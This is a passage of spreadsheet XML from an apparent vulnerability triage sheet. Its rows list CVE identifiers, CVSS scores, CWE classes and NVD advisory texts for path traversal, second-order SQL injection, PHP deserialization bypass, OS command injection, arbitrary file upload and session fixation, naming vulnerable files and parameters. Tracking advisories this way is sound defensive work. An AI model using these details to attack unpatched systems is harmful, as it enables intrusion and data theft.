      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, the executeStep file-step implementation in backend/src/agents/executor.js passes the user-controlled step.path value through path.resolve with process.cwd() and then uses the resulting path for read or write operations without checking that it remains in an approved workflow directory. An authenticated user who can create or modify workflow file steps can supply traversal segments to escape the intended workspace and read sensitive files or write and overwrite files accessible to the backend process, including application-adjacent files when process permissions allow. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54520</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54596</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated Technician or higher with access to at least one client invoice can inject SQL through the frequency parameter handled by agent/post/recurring_invoice.php. The handler passes recurring_invoice_frequency through sanitizeInput but interpolates it unquoted into DATE_ADD, allowing SQL syntax to escape the interval expression, assign additional INSERT columns, store subquery results in recurring_invoice_note, and expose those results through agent/recurring_invoice.php. The persisted recurring_invoice_frequency can execute again when Force Recurring uses it in a later UPDATE, allowing another legitimate user to trigger the second-order injection. This can expose password hashes, SMTP credentials, user records, and database metadata, modify database fields, and enable administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54596</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76834</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>b2evolution CMS versions 6.7.8 through 7.2.5 contain an incomplete fix for CVE-2016-8901 where the serialized-array object check in param_check_serialized_array() fails to reject payloads with negative integer array keys. Unauthenticated attackers can submit crafted serialized PHP objects via POST requests to htsrv/call_plugin.php that bypass validation and reach unserialize(), instantiating arbitrary PHP objects with attacker-chosen properties that may enable code execution if suitable POP gadget chains exist.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76834</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81442</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information tampering and Unauthorized access.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81442</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81475</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81475</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81476</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81476</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81478</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81478</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87935</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The Paid Downloads plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 3.15 via the admin_request_handler function. This is due to missing authorization and file type validation in the admin_request_handler function, which is reachable unauthenticated via is_admin() returning true for /wp-admin/admin-post.php. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. On Apache servers where AllowOverride is enabled, an .htaccess file placed in the upload directory may block direct HTTP retrieval of uploaded files, limiting exploitability to stacks that do not honor .htaccess directives such as nginx, LiteSpeed, and Apache with AllowOverride None.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87935</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92984</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 accepts session identifiers from query strings and request variables instead of cookies alone, allowing unauthenticated attackers to fixate victim sessions. Attackers can obtain a valid session identifier, send victims a crafted link containing it, and replay the identifier after the victim authenticates to hijack their account and access.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92984</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78428</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>For users authenticated through SAML or OpenID Connect (OIDC), this vulnerability can result in one user receiving another user's authenticated session when multiple SSO login attempts occur concurrently</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78428</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25282</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing unverified data from a neighboring system causes out of bound memory access.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25282</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59607</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying large input data exceeds normal allocation limits.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59607</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24073</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing decode statistics due to insufficient validation of offset against structure size.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24073</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24074</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing data with large offset and length values exceeds buffer limits during data copy operations.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24074</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24075</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when multiple threads issue concurrent IOCTL requests to the device control handler due to improper synchronization and race conditions.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24075</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25278</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing I2C transfer requests due to a race condition between memory allocation and data copying.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25278</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25280</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing escape handling flow with insufficient user buffer sizes.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25280</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25290</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
